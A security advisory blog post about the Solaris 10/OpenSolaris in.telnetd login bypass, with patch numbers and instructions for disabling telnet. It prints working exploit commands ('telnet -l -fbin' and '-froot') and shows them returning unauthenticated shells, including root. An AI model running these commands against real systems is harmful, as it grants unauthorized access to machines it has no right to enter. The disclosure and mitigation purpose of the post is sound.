UPDATE: SunAlert 102802 and IDR/ISR official patches for this issue have been released:

Ooops, how embarrassing, Solaris 10/OpenSolaris has a very silly stupid vulnerability in in.telnetd/login that has come to light.

Essentially, you can get access to a remote Solaris 10/OpenSolaris system (which has telnet enabled) without any prompts or fancy tricks by simply using the "-f<username>" option:


[ruler : ~]$ telnet -l -fbin devon
Trying 129.156.87.95...
Connected to devon.
Escape character is '^]'.
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
[devon : ~]$ id
uid=2(bin) gid=2(bin)
[devon : ~]$

This works for any user on the system. You can even gain root access if root access is not restricted to the console only (CONSOLE=/dev/console commented out in /etc/default/login):


[ruler : ~]$ telnet -l -froot devon
Trying 129.156.87.95...
Connected to devon.
Escape character is '^]'.
Last login: Mon Feb 12 14:01:51 from sr1-egmp-12.UK.
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
[devon : ~]# id
uid=0(root) gid=0(root)
[devon : ~]# grep /dev/console /etc/default/login
# CONSOLE=/dev/console
[devon : ~]#

It's quite amazing how long it's taken this issue to surface, especially considering how trivial it is. You can see details of the offending lines of code in this PDF.

That said, why are you still using telnet anyway? Haven't you been warned about the dangers of using telnet?. You should have abandoned telnet years ago.

What's more, if you're running a new install (not an upgrade) of Solaris 10 update 3 (11/06) you would have had to deliberately open yourself up to this vulnerability as Solaris 10u3 is the first release of Solaris to be "Secure by default", which means in.telnetd is DISABLED.

So, without further ado, disable telnet access on your Solaris 10 and later hosts NOW:


[devon : ~]# svcs telnet
STATE STIME FMRI
online 14:20:21 svc:/network/telnet:default
[devon : ~]# svcadm disable telnet
[devon : ~]# svcs telnet
STATE STIME FMRI
disabled 14:27:42 svc:/network/telnet:default
[devon : ~]#

You have been warned.

UPDATE: SunAlert 102802 and IDR/ISR official patches for this issue have been released:
  • SPARC Platform
    • Solaris 10 IDR125456-01 (Requires: 120068-01 - SunOS 5.10: in.telnetd Patch)
      120068-02 - SunOS 5.10: in.telnetd Patch
  • x86 Platform
    • Solaris 10 IDR125457-01 (Requires: 120069-01 - SunOS 5.10_x86: in.telnetd Patch)
      120069-02 - SunOS 5.10_x86: in.telnetd Patch

As this is a security issue, the IDR/ISRs official patches are available direct to the public from https://sunsolve.sun.com/tpatches the links provided above.

Congratulations to Alan Hargreaves and team for such an amazingly quick turn around - I've never seen a bug fixed this quick in all my time at Sun.

Please install these NOW if you use telnet. Official patches will follow shortly.